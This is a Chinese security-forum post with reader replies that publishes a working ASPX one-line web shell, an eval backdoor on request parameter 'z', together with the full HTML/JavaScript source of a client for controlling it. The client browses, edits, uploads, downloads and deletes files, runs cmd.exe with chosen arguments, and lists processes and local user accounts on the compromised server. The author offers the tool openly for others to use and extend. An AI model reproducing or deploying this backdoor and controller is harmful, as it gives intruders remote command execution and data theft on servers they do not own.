文章作者：kj021320
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

注：本文章首发I.S.T.O技术团队，后由原创作者友情提交到邪恶八进制信息安全团队论坛。

Author : kj021320
Team : I.S.T.O

服务器端 一句话为

<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["z"],"unsafe"));%>

这个一句话不用说了！我之前已经发表文章讲解过！

client端HTML页面代码如下

Code Language : HTML

1. <html>
2. <head>
3. <meta http-equiv=Content-Type content=\"text/html; charset=gb2312\">
4. <title>I.S.T.O ASPX-C/S-SHELL 1.0 by kj021320</title>
5. <style type=\"text/css\">
6.  body,td{font-size: 12px;}
7. table{T:expression(this.border='1',this.borderColorLight='Black',this.borderColorDark='White');}
8.  input,select{font-size:12px;}
9.  body{margin-left:0px;margin-top:0px;margin-right:0px;margin-bottom:0px;}
10.  td{white-space:nowrap;}
11.  a{color:black;text-decoration:none;}
12. </style>
13. <!--
14. Author: kj021320
15. Team : I.S.T.O
16. Description:
17.  
18. file/folder copy,move and view
19. file down , edit , delete , upload and run
20. server config and user information
21.  
22. U can extend the ASPX-C/S-SHELL function and use setCmdText(the js fucntion) to commit the command
23. -->
24. <script language=\"javascript\">
25.  function copyFile(s,t){
26.  s=s.replace(/\\/g,\"\\\\\");
27.  t=t.replace(/\\/g,\"\\\\\");
28.  setCmdText('var s=\"'+s+'\",t=\"'+t+'\";System.IO.File.Copy(s,t);');
29.  }
30.  function runFile(s,a){
31.  s=s.replace(/\\/g,\"\\\\\");
32.  a=a.replace(/\\/g,\"\\\\\");
33.  setCmdText('var s=\"'+s+'\",a=\"'+a+'\";var p=new System.Diagnostics.Process();p.StartInfo.UseShellExecute=false;p.StartInfo.RedirectStandardOutput=true;p.StartInfo.FileName=s;p.StartInfo.Arguments=a;p.Start();var o=p.StandardOutput.ReadToEnd();\"<pre>\"+o+\"<pre>\"');
34.  }
35.  function editFile(f){
36.  f=f.replace(/\\/g,\"\\\\\");
37.  var code='var stream:System.IO.TextReader,filename,os=\"\",thePath=\"'+f+'\",code;stream=new System.IO.StreamReader(thePath);os=stream.ReadToEnd();os=\"<form method=post><input name=fname value=\"+thePath+\"><input type=submit name=s value=save><textarea name=t rows=30 style=width:100%;>\"+Server.HtmlEncode(os)+\"</textarea><input name=\\\"'+address.KEY.value+'\\\" type=hidden value=\'var stream:System.IO.TextWriter;stream=new System.IO.StreamWriter(Request.Item[\\\"fname\\\"]);stream.Write(Request.Item[\\\"t\\\"]);stream.Close();stream=null;Response.Write(\\\"OK\\\")\'></form>\";stream.Close();stream=null;os;';
38.  setCmdText(code);
39.  }
40.  function upfile(f){
41.  f=f.replace(/\\/g,\"\\\\\");
42.  setCmdText('var files=Request.Files;if(files.Count!=0)files.Get(\"myfile\").SaveAs(\"'+f+'\");');
43.  }
44.  function downFile(f){
45.  f=f.replace(/\\/g,\"\\\\\");
46.  setCmdText('var stream,filename,bs,os,thePath=\"'+f+'\";Response.Clear();bs=new byte[1024];stream=new System.IO.FileStream(thePath,System.IO.FileMode.Open);filename=thePath.substr(thePath.lastIndexOf(\"\\\\\")+1);Response.AddHeader(\"Content-Disposition\",\"attachment; filename=\"+Server.UrlEncode(filename).replace(\"+\",\" \"));Response.AddHeader(\"Content-Length\",stream.Length);Response.Charset=\"UTF-8\";Response.ContentType=\"application/octet-stream\";os=Response.OutputStream;var i=stream.Read(bs,0,bs.Length);while(i>0){os.Write(bs,0,i);i=stream.Read(bs,0,bs.Length);}os=null;Response.Flush();stream.Close();stream=null;Response.End();');
47.  }
48.  function ProcessInfo(){
49.  setCmdText('var o;var proc=System.Diagnostics.Process.GetCurrentProcess();o=\"<h4>CurrentProcessInfor:</h4>\";o+=getProcessInfo(proc);var ptc=proc.Threads;for(var p in ptc){o+=\"<br>\"+getProcessThreadInfo(p);}o+=\"<h4>OtherProcessInfor:</h4>\";var ps=System.Diagnostics.Process.GetProcesses(proc.MachineName);for(var p in ps){o+=\"<br>\"+getProcessInfo(ps[p]);}function getProcessThreadInfo(pt:System.Diagnostics.ProcessThread):String{var o=\"<br>Id:\"+pt.Id; o+=\"<br>BasePriority:\"+pt.BasePriority; o+=\"<br>CurrentPriority:\"+pt.CurrentPriority;o+=\"<br>Site:\"+pt.Site;o+=\"<br>StartAddress:\"+pt.StartAddress;o+=\"<br>ThreadState:\"+pt.ThreadState;return o;}function getProcessInfo(proc:System.Diagnostics.Process):String{var o=\"<br>ProcessName:\"+proc.ProcessName;o+=\"<br>BasePriority:\"+proc.BasePriority;o+=\"<br>MachineName:\"+proc.MachineName;o+=\"<br>MainWindowTitle:\"+proc.MainWindowTitle;try{o+=\"<br>MaxWorkingSet:\"+proc.MaxWorkingSet;o+=\"<br>MinWorkingSet:\"+proc.MinWorkingSet;}catch(e){}o+=\"<br>NonpagedSystemMemorySize:\"+proc.NonpagedSystemMemorySize;o+=\"<br>PagedMemorySize:\"+proc.PagedMemorySize;o+=\"<br>PagedSystemMemorySize:\"+proc.PagedSystemMemorySize;o+=\"<br>PeakPagedMemorySize:\"+proc.PeakPagedMemorySize;o+=\"<br>PeakVirtualMemorySize:\"+proc.PeakVirtualMemorySize;o+=\"<br>PeakWorkingSet:\"+proc.PeakWorkingSet;o+=\"<br>PrivateMemorySize:\"+proc.PrivateMemorySize;o+=\"<br>VirtualMemorySize:\"+proc.VirtualMemorySize;o+=\"<br>WorkingSet:\"+proc.WorkingSet;return o;}');
50.  }
51.  function userInfo(){
52.  setCmdText('function getUserInfo(strUser:String):String{var User,Flags,o=\"\";try{ User=GetObject(\"WinNT://./\"+strUser+\",user\");with(User){o+=\"<br>Description:\"+User.Description+\"<br>\";o+=\"PasswordExpired:\"+Get(\"PasswordExpired\")+\"<br>\";Flags=Get(\"UserFlags\");o+=\"passover:\"+(Flags==65536)+\"<br>\";o+=\"CannotChangPass:\"+(Flags==64)+\"<br>\";o+=\"GlobalAccount:\"+(Flags==256)+\"<br>\";o+=\"PasswordMinimumLength:\"+PasswordMinimumLength+\"<br>\";o+=\"PasswordRequired:\"+PasswordRequired+\"<br>\";o+=\"AccountDisabled:\"+AccountDisabled+\"<br>\";o+=\"IsAccountLocked:\"+IsAccountLocked+\"<br>\";o+=\"Profile:\"+Profile+\"<br>\";o+=\"LoginScript:\"+LoginScript+\"<br>\";o+=\"HomeDirectory:\"+HomeDirectory+\"<br>\";o+=\"HomeDirDrive:\"+Get(\"HomeDirDrive\")+\"<br>\";o+=\"AccountExpirationDate:\"+AccountExpirationDate+\"<br>\";o+=\"BadLoginCount:\"+BadLoginCount+\"<br>\";o+=\"LastLogin:\"+LastLogin+\"<br>\";o+=\"LastLogoff:\"+LastLogoff+\"<br>\";}}catch(e){}return o;}function Userinfo():String{var User,Group,Computer,o=\"\";Computer=GetObject(\"WinNT://.\");Computer.Filter=new Array(\"User\");o+=\"User:<hr>\";for(User in Computer){o+=\"<li>\"+User.Name+\"</li>\";o+=getUserInfo(User.Name);o+=\"<hr>\";}o+=\"UserGroup:<hr>\";Computer.Filter=new Array(\"Group\");for(Group in Computer){o+=\"<li>\"+Group.Name+\"</li>\"+Group.Description+\"<hr>\";}return o;}Userinfo();');
53.  }
54.  function delFile(s){
55.  s=s.replace(/\\/g,\"\\\\\");
56.  setCmdText('var s=\"'+s+'\";System.IO.File.Delete(s);');
57.  }
58.  function moveFile(s,t){
59.  s=s.replace(/\\/g,\"\\\\\");
60.  t=t.replace(/\\/g,\"\\\\\");
61.  setCmdText('var s=\"'+s+'\",t=\"'+t+'\";if(System.IO.File.Exists(s))System.IO.File.Move(s,t);if(System.IO.Directory.Exists(s))System.IO.Directory.Move(s,t);');
62.  }
63.  function Info(){
64.  setCmdText('var o=\"\";o+=\"<br>MachineName:\"+Environment.MachineName;o+=\"<br>UserDomainName:\"+Environment.UserDomainName;o+=\"<br>UserName:\"+Environment.UserName;o+=\"<br>OS:\"+Environment.OSVersion;o+=\"<br>ADDRESS:\"+Request.ServerVariables(\"LOCAL_ADDR\");o;');
65.  }
66.  function check(){
67.  Top.action=Top.URL.value;
68.  setCmdName(Top.KEY.value);
69.  setCmdText(\"Server.MapPath(\\".\\")\");
70.  }
71.  function listFolder(p){
72.  p=p.replace(/\\/g,\"\\\\\");
73.  setCmdText('var p=\"'+p+'\",output=\"\";output+=\"DIR:<br>\";if(System.IO.Directory.Exists(p)){var ds=System.IO.Directory.GetDirectories(p);for(var i in ds)output+=ds[i]+\"<br>\";output+=\"FILE:<br>\";var fs=System.IO.Directory.GetFiles(p);for(var i in fs)output+=fs[i]+\"<br>\";}output;');
74.  }
75.  function setCmdName(n){
76.  getCmd().name=n;
77.  }
78.  function setCmdText(str){
79.  getCmd().value=str;
80.  }
81.  function getCmd(){
82.  return document.getElementById(\"Command\");
83.  }
84. </script>
85. </head>
86. <body>
87.  <table width=100% height=100% border=0 bgcolor=menu>
88.  <tr><td height=30 colspan=2>
89.  <table width=100% height=25 border=0>
90.  <form name=address method=post target=Display enctype=\"multipart/form-data\" >
91.  <tr><td width=60 align=center>SHELL:</td><td style=width:80%>
92.  <input name=URL style=width:90% value=\"http://127.0.0.1/kj021320.aspx\"> KEY:
93.  <input name=KEY style=width:5%>
94.  <input name=cmd type=hidden id=Command>
95.  </td><td align=center><input name=Submit onClick=\"check();\" type=submit value=link>
96.  </td></tr>
97.  <tr align=center><td>path:</td><td><input name=path style=width:100%></td><td><input name=view type=submit value=view onclick=\"listFolder(path.value);\"></td></tr>
98.  
99.  <tr align=center><td>Opt:</td><td>source:<input name=sname style=width:40%>target:<input name=tname style=width:40%></td><td> <input type=submit name=cp value=copy onclick=\"copyFile(sname.value,tname.value);\"><input type=submit name=mv value=move onclick=\"moveFile(sname.value,tname.value);\"></td></tr>
100.  
101.  <tr align=center><td>FileOpt:</td><td>Filepath:<input name=fp style=width:80%></td><td><input type=submit name=down value=down onclick=\"downFile(fp.value);\"><input type=submit name=edit onclick=\"editFile(fp.value);\" value=edit><input type=submit name=del value=del onclick=\"delFile(fp.value);\"></td></tr>
102.  
103.  <tr align=center><td>RunFile:</td><td>Filepath:<input name=rfp value=\"c:\windows\system32\cmd.exe\" style=width:40%>Args:<input name=args style=width:40%></td><td><input type=submit name=run value=run onclick=\"runFile(rfp.value,args.value);\"></td></tr>
104.  
105.  <tr align=center><td>Info:</td><td><input type=submit name=req value=Info onclick=\"Info();\"><input type=submit name=proc value=Process onclick=\"ProcessInfo();\"><input type=submit name=userInf value=userInfo onclick=\"userInfo();\"></td><td></td></tr>
106.  
107.  <tr align=center><td>upfile:</td><td><input type=file name=myfile style=width:40%>save:<input type=text name=safile style=width:40%></td><td><input type=submit name=up value=upfile onclick=\"upfile(safile.value);\"></td></tr>
108.  </form></table></td></tr><tr><td>
109.  <iframe name=Display width=100% src=http://blog.csdn.net/I_S_T_O/ height=100% scrolling=yes></iframe>
110.  </td></tr></table>
111. </body></html>
112. <script>
113.  var Top=top.address;
114. </script>

Parsed in 0.295 seconds

基本上平时ASPXSHELL的文件操作功能我都加入进去了 注册表跟数据库操作的没写！多加了个进程浏览 用户组浏览 具体更多的功能迟点再更新吧~具体更新信息请关注I.S.T.O 开源项目区http://blog.csdn.net/I_S_T_O/category/325894.aspx 没有实现的功能,有兴趣的朋友可以接力 ：）

转载请著名出处


PS: EST 论坛代码好象给UBB处理了~ -_- 代码拷贝请到 I.S.T.O BLOG

执行cmd,编辑文件，上传下载，进程信息，用户信息,再加上楼猪所说的注册表和数据库功能貌似就差不多了。
Response.Write方法返回，不知道在插入其他aspx文件后正常回显会不会成为一个问题...

你测试了就知道！这个一句话 最大的遗憾就是不能插入其他文件！因为.net中 每个ASPX文件只能支持一种语言！本来这个shell是很安全的！ 只是因为转的人太多！然后.....
害我也丢了好多 LLEHSBEW  ...
不过技术还是会进步的！新的一句话是有的！不过暂时不公布而已！ ：）

懒得测试了....
  搞站一点前途都没有。

引用:

引用第3楼remax于2007-09-18 15:33发表的 :

懒得测试了....
  搞站一点前途都没有。

每个人的价值观都不一样~~~另一种意义上面只是对技术的一个追求！ 为什么有人喜欢挖溢出  有人喜欢写exp   有人喜欢啃ASP PHP代码公布0DAY  而有人喜欢不断开发工具(例如我 )~？

顶楼猪一个
其实我也是个程序员。
研究技术是好的，搞站也没错，挂马或者卖权限就不对了，毫无建设性意义，有碍社会和谐啊..

楼主这个写得不错，在上次文章中有了扩张。
本人在楼主的耐心指导下，也成功测试过了。
在此感谢楼猪--_--

貌似 现在PHP要多些啊
ASP的怎么少了